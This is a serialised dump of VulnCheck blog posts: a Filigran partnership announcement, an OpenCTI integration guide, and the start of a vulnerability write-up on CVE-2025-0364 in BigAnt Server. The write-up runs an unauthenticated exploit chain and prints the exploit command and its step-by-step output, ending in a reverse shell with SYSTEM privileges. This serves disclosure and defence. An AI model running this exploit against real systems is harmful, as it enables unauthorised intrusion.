We deliver key insights on vulnerability management, exploitation and major trends we can extrapolate from our dataset to continuously support practitioners.",[18,45067,211,45068,45071],{},[47,45069,216],{"href":214,"rel":45070},[51]," has the broadest coverage.",{"title":219,"searchDepth":220,"depth":220,"links":45073},[45074,45075,45076,45077,45078],{"id":44991,"depth":220,"text":44992},{"id":45001,"depth":220,"text":45002},{"id":45043,"depth":220,"text":45044},{"id":45053,"depth":220,"text":45054},{"id":201,"depth":220,"text":202},"2025-04-14","VulnCheck treats every CVE as a forever-day, because we know exploitation doesn’t adhere to timelines or maintenance cycles.",{"slug":45082},"nist-nvd-deferred","\u002Fblog\u002Fnist-nvd-deferred",{"title":44959,"description":45080},"blog\u002Fnist-nvd-deferred",[242,1279,45087,33173],"exploit-intel","6dT__c-J5PWlPPG9LDa6Aen0SI033R7xJvBJK_zXVss",{"id":45090,"title":45091,"articles":7,"authors":45092,"body":45094,"date":45328,"description":45113,"extension":234,"image":7,"link":7,"meta":45329,"navigation":237,"path":45331,"seo":45332,"series":7,"stem":45333,"subtype":7,"tags":7,"__hash__":45334},"blog\u002Fblog\u002Fvulncheck-filigran-parternship.md","VulnCheck & Filigran: Delivering Actionable Security Intelligence for the Enterprise",[45093],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":45095,"toc":45313},[45096,45101,45107,45111,45114,45121,45127,45130,45144,45147,45153,45156,45160,45163,45167,45170,45174,45177,45181,45184,45190,45193,45196,45207,45213,45216,45245,45248,45250,45253,45256,45263,45267,45270,45273,45277,45280,45310],[1920,45097,45099],{"id":45098},"vulncheck-filigran-delivering-actionable-security-intelligence-for-the-enterprise",[295,45100,45091],{},[18,45102,45103],{},[68,45104],{"alt":45105,"src":45106,"style":40707},"VulnCheck & Filigran 
Parternship","\u002Fblog\u002Fvulncheck-filigran-parternship\u002Fimage-1.png",[61,45108,45109],{"id":40710},[295,45110,40713],{},[18,45112,45113],{},"Filigran and VulnCheck are proud to announce a strategic partnership that transforms enterprise threat intelligence capabilities through seamless integration. This collaboration brings together Filigran's market-leading OpenCTI platform with VulnCheck's comprehensive exploit intelligence solutions, creating a powerful joint offering that delivers immediate business value to security teams to enable scalable, automated response actioning.",[43656,45115,45118],{"author":45116,"position":45117},"Jan Johansen","SVP Global Alliances",[18,45119,45120],{},"\"I am thrilled to give the OpenCTI community access to this leading source of Vulnerability intelligence,\" said Jan Johansen, SVP Global Alliances. \"This partnership enables security teams to leverage VulnCheck's exceptional vulnerability data directly within their existing OpenCTI workflows.\"",[61,45122,45124],{"id":45123},"addressing-critical-enterprise-security-challenges",[295,45125,45126],{},"Addressing Critical Enterprise Security Challenges",[18,45128,45129],{},"Today's security teams face mounting pressure to:",[22,45131,45132,45135,45138,45141],{},[25,45133,45134],{},"Autonomously identify which vulnerabilities actually pose material risk to their organization",[25,45136,45137],{},"Reduce alert fatigue and focus resources on the threats that matter",[25,45139,45140],{},"Demonstrate ROI on security investments to executive stakeholders",[25,45142,45143],{},"Accelerate time-to-remediation for critical vulnerabilities that are known exploited with linkages to threat actor activity, botnets and ransomware families",[18,45145,45146],{},"The integration between VulnCheck and Filigran's OpenCTI directly addresses these challenges by providing actionable, contextualized intelligence that drives efficient SecOps workflow for enterprise teams across vulnerability 
management, cyber threat intelligence, AppSec and IR functions.",[61,45148,45150],{"id":45149},"quantifiable-business-benefits",[295,45151,45152],{},"Quantifiable Business Benefits",[18,45154,45155],{},"Organizations leveraging the VulnCheck-Filigran integration can realize substantial business value:",[993,45157,45159],{"id":45158},"_1-reduced-mean-time-to-remediate-mttr","1. Reduced Mean Time to Remediate (MTTR)",[18,45161,45162],{},"By automatically identifying vulnerabilities actively being exploited in the wild, security teams can cut through the noise and focus on what matters most. This integration helps organizations significantly accelerate remediation timeframes for the vulnerabilities that pose the greatest actual risk to their business based on CVEs that are weaponized, exploited in the wild or predicted to be exploited.",[993,45164,45166],{"id":45165},"_2-enhanced-security-resource-optimization","2. Enhanced Security Resource Optimization",[18,45168,45169],{},"Security teams can now allocate their limited resources more effectively by focusing on vulnerabilities that pose genuine risk based on real-world exploitation data rather than theoretical CVSS scores alone. This intelligence-driven approach enables teams to maximize the impact of their security efforts. This integration is a force multiplier for any enterprise team given the global shortage of analysts.",[993,45171,45173],{"id":45172},"_3-improved-cross-team-collaboration","3. Improved Cross-Team Collaboration",[18,45175,45176],{},"The integration creates a unified intelligence platform that bridges the gap between vulnerability management, threat intelligence, and security operations functions in the enterprise. This shared operational picture enhances communication and streamlines response workflows.",[993,45178,45180],{"id":45179},"_4-demonstrable-security-roi","4. 
Demonstrable Security ROI",[18,45182,45183],{},"By focusing on exploitable vulnerabilities with clear business impact, security leaders can more effectively communicate value to executive stakeholders through concrete metrics and risk reduction data.",[61,45185,45187],{"id":45186},"strategic-business-value",[295,45188,45189],{},"Strategic Business Value",[18,45191,45192],{},"The VulnCheck-OpenCTI integration transforms vulnerability management from a volume-based approach without a way to prioritize material CVEs, to an intelligence-driven strategy. Instead of attempting to address thousands of theoretical CVEs, security teams can now focus on the small percentage of vulnerabilities being actively exploited that pose a material risk to their business.",[18,45194,45195],{},"This strategic shift enables organizations to:",[22,45197,45198,45201,45204],{},[25,45199,45200],{},"Optimize security resources on threats that matter most",[25,45202,45203],{},"Make intelligence-driven decisions based on real-world exploitation intelligence",[25,45205,45206],{},"Strengthen their security posture while improving operational efficiency",[61,45208,45210],{"id":45209},"how-the-integration-works",[295,45211,45212],{},"How the Integration Works",[18,45214,45215],{},"The VulnCheck Connector for OpenCTI seamlessly imports and translates comprehensive vulnerability intelligence into structured STIX objects within the OpenCTI platform. 
The connector supports multiple intelligence feeds, including:",[22,45217,45218,45224,45229,45234,45239],{},[25,45219,45220,45223],{},[295,45221,45222],{},"VulnCheck Known Exploited Vulnerabilities (KEV)",": Prioritize vulnerabilities actively being exploited in the wild",[25,45225,45226,45228],{},[295,45227,42306],{},": Map exploits to specific vulnerabilities with technical details",[25,45230,45231,45233],{},[295,45232,1245],{},": Identify vulnerabilities commonly used as entry points by threat actors",[25,45235,45236,45238],{},[295,45237,1251],{},": Correlate network indicators with vulnerability exploitation attempts",[25,45240,45241,45244],{},[295,45242,45243],{},"Ransomware Intelligence",": Associate vulnerabilities with specific ransomware families and campaigns",[18,45246,45247],{},"Each feed is systematically processed to generate actionable intelligence that integrates directly into existing OpenCTI workflows, enabling rapid analysis and response.",[61,45249,202],{"id":201},[18,45251,45252],{},"VulnCheck is a leader in vulnerability and exploit intelligence, equipping organizations with real-time, high-fidelity data to enhance security operations. By delivering machine-readable threat intelligence, VulnCheck empowers security teams to make informed decisions, prioritize vulnerabilities, and mitigate risks efficiently.",[18,45254,45255],{},"VulnCheck delivers 100% autonomous exploit intelligence solutions to enterprise, Federal government, and cybersecurity organizations. 
VulnCheck provides machine-readable feeds that enable analysts to prioritize vulnerabilities that genuinely matter for defending their organization.",[18,45257,45258,45259,45262],{},"OpenCTI users can sign up for the VulnCheck community feeds at ",[47,45260,40745],{"href":40745,"rel":45261},[51]," and access the VulnCheck KEV (the VulnCheck Known Exploited Vulnerabilities Catalog) and VulnCheck NVD++ (single source of NIST NVD enriched with VulnCheck CPE and Mitre CVE list) feeds.",[61,45264,45265],{"id":1902},[295,45266,1903],{},[18,45268,45269],{},"This partnership marks a significant advancement in cyber threat intelligence. By integrating VulnCheck's exploit and vulnerability insights into Filigran's OpenCTI-powered eXtended Threat Management (XTM) suite, security teams can enhance their proactive defense strategies and strengthen their overall security posture.",[18,45271,45272],{},"The VulnCheck-OpenCTI integration is a natural fit within Filigran's XTM framework, which helps organizations understand threat environments, anticipate and detect incidents, and respond effectively to security challenges. 
This collaboration reinforces Filigran's commitment to providing comprehensive, actionable intelligence that enables security teams to stay ahead of evolving threats.",[61,45274,45275],{"id":13101},[295,45276,13102],{},[18,45278,45279],{},"Explore additional resources to maximize the value of this integration:",[22,45281,45282,45289,45296,45303],{},[25,45283,45284],{},[47,45285,45288],{"href":45286,"rel":45287},"https:\u002F\u002Fdocs.vulncheck.com\u002Fintegrations\u002Fopencti",[51],"VulnCheck Integration Documentation",[25,45290,45291],{},[47,45292,45295],{"href":45293,"rel":45294},"https:\u002F\u002Fgithub.com\u002FOpenCTI-Platform\u002Fconnectors\u002Ftree\u002Fmaster\u002Fexternal-import\u002Fvulncheck#opencti-vulncheck-connector",[51],"OpenCTI VulnCheck Connector Documentation",[25,45297,45298],{},[47,45299,45302],{"href":45300,"rel":45301},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fopencti-integration",[51],"VulnCheck Integration Announcement",[25,45304,45305],{},[47,45306,45309],{"href":45307,"rel":45308},"https:\u002F\u002Ffiligran.io\u002Fbook-a-demo\u002F",[51],"Request a Demo",[18,45311,45312],{},"Stay tuned for further updates as we continue to expand our joint solution 
offerings.",{"title":219,"searchDepth":220,"depth":220,"links":45314},[45315,45316,45317,45323,45324,45325,45326,45327],{"id":40710,"depth":220,"text":40713},{"id":45123,"depth":220,"text":45126},{"id":45149,"depth":220,"text":45152,"children":45318},[45319,45320,45321,45322],{"id":45158,"depth":1266,"text":45159},{"id":45165,"depth":1266,"text":45166},{"id":45172,"depth":1266,"text":45173},{"id":45179,"depth":1266,"text":45180},{"id":45186,"depth":220,"text":45189},{"id":45209,"depth":220,"text":45212},{"id":201,"depth":220,"text":202},{"id":1902,"depth":220,"text":1903},{"id":13101,"depth":220,"text":13102},"2025-03-27",{"slug":45330},"vulncheck-filigran-parternship","\u002Fblog\u002Fvulncheck-filigran-parternship",{"title":45091,"description":45113},"blog\u002Fvulncheck-filigran-parternship","n-hOyjcQ8iEnu4h4lgKXoJZdZBmldBpcLwUGnkJabrk",{"id":45336,"title":45337,"articles":7,"authors":45338,"body":45344,"date":45498,"description":45499,"extension":234,"image":7,"link":7,"meta":45500,"navigation":237,"path":45502,"seo":45503,"series":7,"stem":45504,"subtype":7,"tags":45505,"__hash__":45506},"blog\u002Fblog\u002Fopencti-integration.md","Exploring VulnCheck Intelligence in OpenCTI",[45339],{"name":45340,"avatar":45341,"link":45342,"linkName":45343},"EJ Reilly","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U07KQ29RSUT-9e3e3442d4dd-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fej-reilly\u002F","in\u002Fej-reilly\u002F",{"type":15,"value":45345,"toc":45493},[45346,45349,45355,45358,45373,45376,45408,45411,45417,45421,45444,45459,45462,45482,45484,45486,45488],[18,45347,45348],{},"VulnCheck is expanding access to its Vulnerability and Exploit Intelligence with a new integration for OpenCTI. 
Now, VulnCheck customers and community members can seamlessly access VulnCheck intelligence within their OpenCTI deployment.",[18,45350,45351],{},[68,45352],{":width":10862,"alt":45353,"src":45354},"OpenCTI Vulnerability Example","\u002Fblog\u002Fopencti-integration\u002Fvuln-example.png",[61,45356,45357],{"id":28191},"How it works",[18,45359,45360,45361,45366,45367,45372],{},"VulnCheck's new integration is an ",[47,45362,45365],{"href":45363,"rel":45364},"https:\u002F\u002Fdocs.opencti.io\u002F6.4.X\u002Fdeployment\u002Fconnectors\u002F#import",[51],"external import connector"," that seamlessly integrates data from VulnCheck's API, converting the data to ",[47,45368,45371],{"href":45369,"rel":45370},"https:\u002F\u002Foasis-open.github.io\u002Fcti-documentation\u002Fstix\u002Fintro.html",[51],"STIX objects"," and importing it into OpenCTI.",[18,45374,45375],{},"Currently we support several VulnCheck sources, including:",[22,45377,45378,45381,45384,45387,45390,45393,45396,45399,45402,45405],{},[25,45379,45380],{},"VulnCheck KEV: Populates OpenCTI with vulnerabilities actively exploited in the wild, focusing on high-priority risks.",[25,45382,45383],{},"VulnCheck-NVD2 \u002F Nist-NVD2: Imports vulnerability information enriched with CVSS scores, descriptions, and associated CPEs.",[25,45385,45386],{},"Exploits: Maps exploits to vulnerabilities and generates corresponding Malware objects in OpenCTI.",[25,45388,45389],{},"EPSS Enrichment: Adds vulnerabilities along with their EPSS scores and percentiles, helping prioritize remediation efforts based on exploit probability.",[25,45391,45392],{},"Ransomware: Creates Malware objects for ransomware families, linking them to associated vulnerabilities.",[25,45394,45395],{},"Threat Actors: Adds Threat Actor objects with external references, relationships to targeted vulnerabilities, and descriptive metadata.",[25,45397,45398],{},"Botnets: Ingests infrastructure data associated with botnet activities and links them to targeted 
vulnerabilities.",[25,45400,45401],{},"Initial Access Indicators: Maps CPEs and vulnerabilities leveraged for initial access tactics.",[25,45403,45404],{},"IP Intelligence: Adds infrastructure and IP-related intelligence, including countries and related vulnerabilities.",[25,45406,45407],{},"Snort\u002FSuricata Rules: Ingests Snort and Suricata rules as Indicators.",[18,45409,45410],{},"In aggregation with other threat intelligence providers, VulnCheck's data helps create a more enriched and contextual view of the threat intelligence you care about.",[18,45412,45413],{},[68,45414],{":width":10862,"alt":45415,"src":45416},"Shadow Tiger Example","\u002Fblog\u002Fopencti-integration\u002Fshadow-tiger.png",[61,45418,45420],{"id":45419},"how-to-get-started","How to Get Started",[18,45422,45423,45424,45429,45430,45435,45436,45439,45440,45443],{},"To get VulnCheck's connector working in your OpenCTI deployment, you'll first want to take a look at the ",[47,45425,45428],{"href":45426,"rel":45427},"https:\u002F\u002Fgithub.com\u002FOpenCTI-Platform\u002Fconnectors\u002Ftree\u002Fmaster\u002Fexternal-import\u002Fvulncheck",[51],"connector's documentation",". In particular, the section for ",[47,45431,45434],{"href":45432,"rel":45433},"https:\u002F\u002Fgithub.com\u002FOpenCTI-Platform\u002Fconnectors\u002Ftree\u002Fmaster\u002Fexternal-import\u002Fvulncheck#vulncheck-connector-configuration",[51],"configuration"," is where you'll find optional configuration parameters for data ingestion. 
You can use ",[886,45437,45438],{},"CONNECTOR_VULNCHECK_DATA_SOURCES"," to filter on the indices and ",[886,45441,45442],{},"CONNECTOR_SCOPE"," to filter on the scope of STIX objects.",[18,45445,45446,45447,45452,45453,45458],{},"You can run it either as a ",[47,45448,45451],{"href":45449,"rel":45450},"https:\u002F\u002Fgithub.com\u002FOpenCTI-Platform\u002Fconnectors\u002Ftree\u002Fmaster\u002Fexternal-import\u002Fvulncheck#manual-deployment",[51],"standalone python process"," or in a ",[47,45454,45457],{"href":45455,"rel":45456},"https:\u002F\u002Fgithub.com\u002FOpenCTI-Platform\u002Fconnectors\u002Ftree\u002Fmaster\u002Fexternal-import\u002Fvulncheck#docker-deployment",[51],"containerized environment",". Either way, you get the same threat intelligence data with the same configurable ingestion options.",[18,45460,45461],{},"For more information, check out the resources below:",[22,45463,45464,45469,45475],{},[25,45465,45466],{},[47,45467,45288],{"href":45286,"rel":45468},[51],[25,45470,45471],{},[47,45472,45474],{"href":45293,"rel":45473},[51],"VulnCheck Connector Documentation",[25,45476,45477],{},[47,45478,45481],{"href":45479,"rel":45480},"https:\u002F\u002Fdocs.opencti.io\u002F6.5.X\u002Fdeployment\u002Fconnectors\u002F",[51],"OpenCTI Connector Documentation",[61,45483,202],{"id":201},[18,45485,45062],{},[18,45487,208],{},[18,45489,211,45490,45071],{},[47,45491,216],{"href":214,"rel":45492},[51],{"title":219,"searchDepth":220,"depth":220,"links":45494},[45495,45496,45497],{"id":28191,"depth":220,"text":45357},{"id":45419,"depth":220,"text":45420},{"id":201,"depth":220,"text":202},"2025-03-13","VulnCheck integrates with OpenCTI - an open-source Threat Intelligence Platform by 
Filigran",{"slug":45501},"opencti-integration","\u002Fblog\u002Fopencti-integration",{"title":45337,"description":45499},"blog\u002Fopencti-integration",[242,1281,23275,1279,33173],"FcI_LhZZwE7uaZ8MPWaWcpNf4Zrr-AL8uEI2G-Y0F7Y",{"id":45508,"title":45509,"articles":7,"authors":45510,"body":45512,"date":53869,"description":53870,"extension":234,"image":7,"link":7,"meta":53871,"navigation":237,"path":53873,"seo":53874,"series":7,"stem":53875,"subtype":7,"tags":53876,"__hash__":53877},"blog\u002Fblog\u002Fbigant-cve-2025-0364.md","BigAnt Small Chain - CVE-2025-0364 Exploitation",[45511],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":45513,"toc":53860},[45514,45517,45526,45530,45542,45545,46431,46434,46438,46441,46452,46458,46461,46467,46470,46481,47065,47077,47573,47600,48108,48119,48654,48657,48814,48821,48827,48833,48837,48855,48935,48944,49547,49553,49559,49576,49585,49589,49595,50282,50295,50302,50352,50358,50364,50373,50379,50853,50868,51664,51667,51713,51716,52395,52398,52402,52409,52415,52437,52443,52446,52452,52455,52461,52464,52467,52491,52494,52500,52507,52513,52516,52520,52523,52566,52576,52579,52965,52972,53814,53817,53819,53844,53857],[18,45515,45516],{},"The BigAntSoft BigAnt Server, which provides a Windows hosted on-premises chat server that focuses on business use cases, is vulnerable to unauthenticated remote code execution via account registration and PHP file uploads. The vulnerability takes advantage of a default exposed SaaS registration that allows an attacker to solve a simple CAPTCHA and then create an administrative user that can upload to the Cloud Storage Add-in. 
The system allows for the upload of PHP files that can be triggered without authentication, leading to an exploit chain from no authentication to remote code execution in all current versions (5.6.06 and below).",[18,45518,45519,45520,45525],{},"The VulnCheck team identified this vulnerability during the triage of ",[47,45521,45524],{"href":45522,"rel":45523},"https:\u002F\u002Fgithub.com\u002Fnscan9\u002FCVE-2024-54761-BigAnt-Office-Messenger-5.6.06-RCE-via-SQL-Injection",[51],"CVE-2024-54761",", which turned out to require administrator access and had an incorrect CVSS Privileges Required (PR) value. The VulnCheck team identified a few quick indicators of insecure programming practices and chose to investigate deeper, leading to the discovery of this authentication bypass and file upload remote code execution. At the time of discovery there were roughly 50 BigAnt servers on the internet, and at the time of publishing this blog there were around 30 identifiable instances.",[61,45527,45529],{"id":45528},"shells-exploit-preamble","Shells & Exploit Preamble",[18,45531,45532,45533,45537,45538],{},"In summary, an attacker can gain full remote code execution unauthenticated via a chain of 10 requests. 
The VulnCheck ",[47,45534,1245],{"href":45535,"rel":45536},"https:\u002F\u002Fvulncheck.com\u002Fproduct\u002Finitial-access-intelligence",[51]," has published the public exploit: ",[47,45539,45540],{"href":45540,"rel":45541},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2025-0364",[51],[18,45543,45544],{},"The following shows the exploit in action:",[1354,45546,45548],{"className":31740,"code":45547,"language":2186,"meta":219,"style":219},"poptart@grimm:~\u002Fsrc\u002Finitial-access\u002Ffeed\u002Fcve-2025-0364 $ .\u002Fbuild\u002Fcve-2025-0364_linux-amd64 -rhost 10.0.0.104 -rport 8000 -lhost 10.0.1.10 -lport 1337 -v -c -e -captcha-hash 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30 -captcha-session 4fbsn0i6bdiuu6vuik99gbhndb -captcha VKZ6\ntime=2025-01-09T14:50:18.502-07:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\ntime=2025-01-09T14:50:18.575-07:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\ntime=2025-01-09T14:50:18.575-07:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.104 port=8000 ssl=false \"ssl auto\"=false\ntime=2025-01-09T14:50:18.575-07:00 level=STATUS msg=\"Validating Bigantsoft Bigant Server target\" host=10.0.0.104 port=8000\ntime=2025-01-09T14:50:18.620-07:00 level=SUCCESS msg=\"Target verification succeeded!\" host=10.0.0.104 port=8000 verified=true\ntime=2025-01-09T14:50:18.620-07:00 level=STATUS msg=\"Running a version check on the remote target\" host=10.0.0.104 port=8000\ntime=2025-01-09T14:50:18.650-07:00 level=VERSION msg=\"The reported version is 5.6.06\" host=10.0.0.104 port=8000 version=5.6.06\ntime=2025-01-09T14:50:18.650-07:00 level=SUCCESS msg=\"The target appears to be a vulnerable version!\" host=10.0.0.104 port=8000 vulnerable=yes\ntime=2025-01-09T14:50:18.650-07:00 level=STATUS msg=\"Password that will be used for authentication: kyLZiAddnH\"\ntime=2025-01-09T14:50:18.650-07:00 level=STATUS msg=\"Registering SaaS org: LBJCUE 
(mpzo@fldlmarv.com) with password: kyLZiAddnH\"\ntime=2025-01-09T14:50:18.675-07:00 level=STATUS msg=\"Getting new PHP session and pinning the SaaS org to the session\"\ntime=2025-01-09T14:50:18.747-07:00 level=STATUS msg=\"Retrieving org SSID from demo page with session v1cir7mh9v4dfv4ik54mhq6so0\"\ntime=2025-01-09T14:50:18.764-07:00 level=STATUS msg=\"Retrieved SSID for LBJCUE: 387360F0-EECD-622B-5B90-C37F2BBD45B3\"\ntime=2025-01-09T14:50:18.765-07:00 level=STATUS msg=\"Activating SaaS organization\"\ntime=2025-01-09T14:50:22.627-07:00 level=STATUS msg=\"Authenticating to the addin SaaS admin\"\ntime=2025-01-09T14:50:22.673-07:00 level=STATUS msg=\"Visiting SaaS addin cloud drive page\"\ntime=2025-01-09T14:50:22.762-07:00 level=STATUS msg=\"Got cloud drive root path UUID: 99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\"\ntime=2025-01-09T14:50:22.762-07:00 level=STATUS msg=\"Attempting to upload `JQsaYCKEOu.php` to cloud drive addin\"\ntime=2025-01-09T14:50:22.819-07:00 level=STATUS msg=\"Attempting to trigger final payload, timeout is expected after callback\"\ntime=2025-01-09T14:50:22.819-07:00 level=STATUS msg=\"Requesting final payload at: http:\u002F\u002F10.0.0.104:8000\u002Fdata\u002F387360F0-EECD-622B-5B90-C37F2BBD45B3\u002Fpan\u002F99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\u002F2025-01-09\u002FJQsaYCKEOu.php\"\ntime=2025-01-09T14:50:22.821-07:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.104:51690\"\ntime=2025-01-09T14:50:22.821-07:00 level=STATUS msg=\"Active shell from 10.0.0.104:51690\"\nMicrosoft Windows [Version 10.0.17763.107]\n(c) 2018 Microsoft Corporation. 
All rights reserved.\n\nC:\\Program Files (x86)\\BigAntSoft\\IM Console\\im_webserver\\htdocs\\data\\387360F0-EECD-622B-5B90-C37F2BBD45B3\\pan\\99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\\2025-01-09>whoami\nwhoami\nnt authority\\system\n\n",[886,45549,45550,45608,45634,45660,45718,45756,45802,45839,45886,45931,45956,45981,46007,46033,46059,46085,46111,46137,46163,46198,46224,46249,46275,46300,46313,46339,46343,46413,46417],{"__ignoreMap":219},[1373,45551,45552,45555,45558,45561,45563,45566,45569,45572,45574,45577,45579,45582,45585,45588,45590,45593,45596,45599,45602,45605],{"class":1375,"line":1376},[1373,45553,45554],{"class":2206},"poptart@grimm:~\u002Fsrc\u002Finitial-access\u002Ffeed\u002Fcve-2025-0364",[1373,45556,45557],{"class":4640}," $ ",[1373,45559,45560],{"class":1391},".\u002Fbuild\u002Fcve-2025-0364_linux-amd64",[1373,45562,38910],{"class":2209},[1373,45564,45565],{"class":5467}," 10.0.0.104",[1373,45567,45568],{"class":2209}," -rport",[1373,45570,45571],{"class":5467}," 8000",[1373,45573,38916],{"class":2209},[1373,45575,45576],{"class":5467}," 10.0.1.10",[1373,45578,38922],{"class":2209},[1373,45580,45581],{"class":5467}," 1337",[1373,45583,45584],{"class":2209}," -v",[1373,45586,45587],{"class":2209}," -c",[1373,45589,38907],{"class":2209},[1373,45591,45592],{"class":2209}," -captcha-hash",[1373,45594,45595],{"class":1391}," 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30",[1373,45597,45598],{"class":2209}," -captcha-session",[1373,45600,45601],{"class":1391}," 4fbsn0i6bdiuu6vuik99gbhndb",[1373,45603,45604],{"class":2209}," -captcha",[1373,45606,45607],{"class":1391}," 
VKZ6\n",[1373,45609,45610,45612,45614,45617,45619,45621,45623,45625,45627,45629,45632],{"class":1375,"line":220},[1373,45611,38930],{"class":4640},[1373,45613,5417],{"class":1397},[1373,45615,45616],{"class":1391},"2025-01-09T14:50:18.502-07:00",[1373,45618,38938],{"class":4640},[1373,45620,5417],{"class":1397},[1373,45622,38943],{"class":1391},[1373,45624,38946],{"class":4640},[1373,45626,5417],{"class":1397},[1373,45628,183],{"class":1387},[1373,45630,45631],{"class":1391},"Certificate not provided. Generating a TLS Certificate",[1373,45633,19057],{"class":1387},[1373,45635,45636,45638,45640,45643,45645,45647,45649,45651,45653,45655,45658],{"class":1375,"line":1266},[1373,45637,38930],{"class":4640},[1373,45639,5417],{"class":1397},[1373,45641,45642],{"class":1391},"2025-01-09T14:50:18.575-07:00",[1373,45644,38938],{"class":4640},[1373,45646,5417],{"class":1397},[1373,45648,38943],{"class":1391},[1373,45650,38946],{"class":4640},[1373,45652,5417],{"class":1397},[1373,45654,183],{"class":1387},[1373,45656,45657],{"class":1391},"Starting TLS listener on 
10.0.1.10:1337",[1373,45659,19057],{"class":1387},[1373,45661,45662,45664,45666,45668,45670,45672,45674,45676,45678,45680,45682,45684,45686,45688,45690,45692,45694,45697,45699,45701,45704,45706,45708,45710,45712,45714,45716],{"class":1375,"line":1852},[1373,45663,38930],{"class":4640},[1373,45665,5417],{"class":1397},[1373,45667,45642],{"class":1391},[1373,45669,38938],{"class":4640},[1373,45671,5417],{"class":1397},[1373,45673,38943],{"class":1391},[1373,45675,38946],{"class":4640},[1373,45677,5417],{"class":1397},[1373,45679,183],{"class":1387},[1373,45681,38979],{"class":1391},[1373,45683,183],{"class":1387},[1373,45685,38984],{"class":4640},[1373,45687,5417],{"class":1397},[1373,45689,445],{"class":1391},[1373,45691,38991],{"class":4640},[1373,45693,5417],{"class":1397},[1373,45695,45696],{"class":1391},"10.0.0.104",[1373,45698,38999],{"class":4640},[1373,45700,5417],{"class":1397},[1373,45702,45703],{"class":1391},"8000",[1373,45705,39007],{"class":4640},[1373,45707,5417],{"class":1397},[1373,45709,5971],{"class":1391},[1373,45711,4883],{"class":1387},[1373,45713,39016],{"class":1391},[1373,45715,183],{"class":1387},[1373,45717,39021],{"class":1391},[1373,45719,45720,45722,45724,45726,45728,45730,45732,45734,45736,45738,45741,45743,45745,45747,45749,45751,45753],{"class":1375,"line":4692},[1373,45721,38930],{"class":4640},[1373,45723,5417],{"class":1397},[1373,45725,45642],{"class":1391},[1373,45727,38938],{"class":4640},[1373,45729,5417],{"class":1397},[1373,45731,38943],{"class":1391},[1373,45733,38946],{"class":4640},[1373,45735,5417],{"class":1397},[1373,45737,183],{"class":1387},[1373,45739,45740],{"class":1391},"Validating Bigantsoft Bigant Server 
target",[1373,45742,183],{"class":1387},[1373,45744,38991],{"class":4640},[1373,45746,5417],{"class":1397},[1373,45748,45696],{"class":1391},[1373,45750,38999],{"class":4640},[1373,45752,5417],{"class":1397},[1373,45754,45755],{"class":1391},"8000\n",[1373,45757,45758,45760,45762,45765,45767,45769,45771,45773,45775,45777,45780,45782,45784,45786,45788,45790,45792,45794,45797,45799],{"class":1375,"line":4724},[1373,45759,38930],{"class":4640},[1373,45761,5417],{"class":1397},[1373,45763,45764],{"class":1391},"2025-01-09T14:50:18.620-07:00",[1373,45766,38938],{"class":4640},[1373,45768,5417],{"class":1397},[1373,45770,39062],{"class":1391},[1373,45772,38946],{"class":4640},[1373,45774,5417],{"class":1397},[1373,45776,183],{"class":1387},[1373,45778,45779],{"class":1391},"Target verification succeeded!",[1373,45781,183],{"class":1387},[1373,45783,38991],{"class":4640},[1373,45785,5417],{"class":1397},[1373,45787,45696],{"class":1391},[1373,45789,38999],{"class":4640},[1373,45791,5417],{"class":1397},[1373,45793,45703],{"class":1391},[1373,45795,45796],{"class":4640}," verified",[1373,45798,5417],{"class":1397},[1373,45800,45801],{"class":1391},"true\n",[1373,45803,45804,45806,45808,45810,45812,45814,45816,45818,45820,45822,45825,45827,45829,45831,45833,45835,45837],{"class":1375,"line":4756},[1373,45805,38930],{"class":4640},[1373,45807,5417],{"class":1397},[1373,45809,45764],{"class":1391},[1373,45811,38938],{"class":4640},[1373,45813,5417],{"class":1397},[1373,45815,38943],{"class":1391},[1373,45817,38946],{"class":4640},[1373,45819,5417],{"class":1397},[1373,45821,183],{"class":1387},[1373,45823,45824],{"class":1391},"Running a version check on the remote 
target",[1373,45826,183],{"class":1387},[1373,45828,38991],{"class":4640},[1373,45830,5417],{"class":1397},[1373,45832,45696],{"class":1391},[1373,45834,38999],{"class":4640},[1373,45836,5417],{"class":1397},[1373,45838,45755],{"class":1391},[1373,45840,45841,45843,45845,45848,45850,45852,45855,45857,45859,45861,45864,45866,45868,45870,45872,45874,45876,45878,45881,45883],{"class":1375,"line":4768},[1373,45842,38930],{"class":4640},[1373,45844,5417],{"class":1397},[1373,45846,45847],{"class":1391},"2025-01-09T14:50:18.650-07:00",[1373,45849,38938],{"class":4640},[1373,45851,5417],{"class":1397},[1373,45853,45854],{"class":1391},"VERSION",[1373,45856,38946],{"class":4640},[1373,45858,5417],{"class":1397},[1373,45860,183],{"class":1387},[1373,45862,45863],{"class":1391},"The reported version is 5.6.06",[1373,45865,183],{"class":1387},[1373,45867,38991],{"class":4640},[1373,45869,5417],{"class":1397},[1373,45871,45696],{"class":1391},[1373,45873,38999],{"class":4640},[1373,45875,5417],{"class":1397},[1373,45877,45703],{"class":1391},[1373,45879,45880],{"class":4640}," version",[1373,45882,5417],{"class":1397},[1373,45884,45885],{"class":1391},"5.6.06\n",[1373,45887,45888,45890,45892,45894,45896,45898,45900,45902,45904,45906,45909,45911,45913,45915,45917,45919,45921,45923,45926,45928],{"class":1375,"line":4792},[1373,45889,38930],{"class":4640},[1373,45891,5417],{"class":1397},[1373,45893,45847],{"class":1391},[1373,45895,38938],{"class":4640},[1373,45897,5417],{"class":1397},[1373,45899,39062],{"class":1391},[1373,45901,38946],{"class":4640},[1373,45903,5417],{"class":1397},[1373,45905,183],{"class":1387},[1373,45907,45908],{"class":1391},"The target appears to be a vulnerable 